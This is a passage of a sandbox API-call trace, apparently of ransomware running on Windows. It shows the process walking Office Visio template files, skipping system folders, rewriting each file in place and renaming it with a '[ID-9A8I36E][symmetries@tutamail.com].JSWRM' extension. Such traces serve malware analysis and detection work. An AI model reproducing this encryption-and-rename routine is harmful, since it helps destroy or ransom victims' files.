lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1aa70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1aa70, lpOverlapped=0x0) returned 1 [0145.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0145.562] CloseHandle (hObject=0x314) returned 1 [0145.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0145.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0145.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0145.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0145.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0145.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0145.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0145.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x250020 [0145.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0145.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0145.562] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_GATEWAY_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_gateway_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_GATEWAY_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_gateway_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250020 | out: hHeap=0x1e0000) returned 1 [0145.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0145.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0145.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0145.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0145.564] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x200fc, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", cAlternateFileName="BPMN_P~3.VST")) returned 1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2=".") returned 1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="..") returned 1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="...") returned 1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="windows") returned -1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="recovery") returned -1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="perflogs") returned -1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="documents and settings") returned -1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="system volume information") returned -1 [0145.564] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpString2="msocache") returned -1 [0145.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0145.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0145.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0145.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0145.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0145.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0145.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0145.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0145.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0145.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_multiple_roles_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.641] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=131324) returned 1 [0145.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x200f0) returned 0x2501e8 [0145.641] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x200f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x200f0, lpOverlapped=0x0) returned 1 [0145.677] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.677] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x200f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x200f0, lpOverlapped=0x0) returned 1 [0145.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0145.679] CloseHandle (hObject=0x314) returned 1 [0145.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0145.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0145.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0145.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0145.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0145.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0145.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0145.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0145.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0145.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0145.679] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_multiple_roles_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_MULTIPLE_ROLES_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_multiple_roles_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0145.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0145.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0145.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0145.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0145.682] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1f43f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", cAlternateFileName="BPMN_P~4.VST")) returned 1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2=".") returned 1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="..") returned 1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="...") returned 1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="windows") returned -1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="recovery") returned -1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="perflogs") returned -1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="documents and settings") returned -1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="system volume information") returned -1 [0145.682] lstrcmpiW (lpString1="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpString2="msocache") returned -1 [0145.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0145.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0145.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0145.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0145.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0145.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0145.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0145.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0145.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0145.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_multiple_roles_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.684] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=128063) returned 1 [0145.684] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f430) returned 0x2501e8 [0145.685] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1f430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1f430, lpOverlapped=0x0) returned 1 [0145.890] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.891] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1f430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1f430, lpOverlapped=0x0) returned 1 [0145.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0145.892] CloseHandle (hObject=0x314) returned 1 [0145.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0145.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0145.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0145.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0145.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0145.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0145.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0145.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0145.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0145.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0145.892] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_multiple_roles_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_MULTIPLE_ROLES_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_multiple_roles_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0145.895] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1cac944, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1cac944, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1cac944, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x29937, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_U.VSSX", cAlternateFileName="BPMN_U~1.VSS")) returned 1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2=".") returned 1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="..") returned 1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="...") returned 1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="windows") returned -1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="recovery") returned -1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="perflogs") returned -1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="documents and settings") returned -1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="system volume information") returned -1 [0145.895] lstrcmpiW (lpString1="BPMN_U.VSSX", lpString2="msocache") returned -1 [0145.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0145.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSSX", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_U.VSSX", lpUsedDefaultChar=0x0) returned 11 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0145.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0145.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSSX", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_U.VSSX", lpUsedDefaultChar=0x0) returned 11 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0145.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0145.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0145.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0145.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.898] 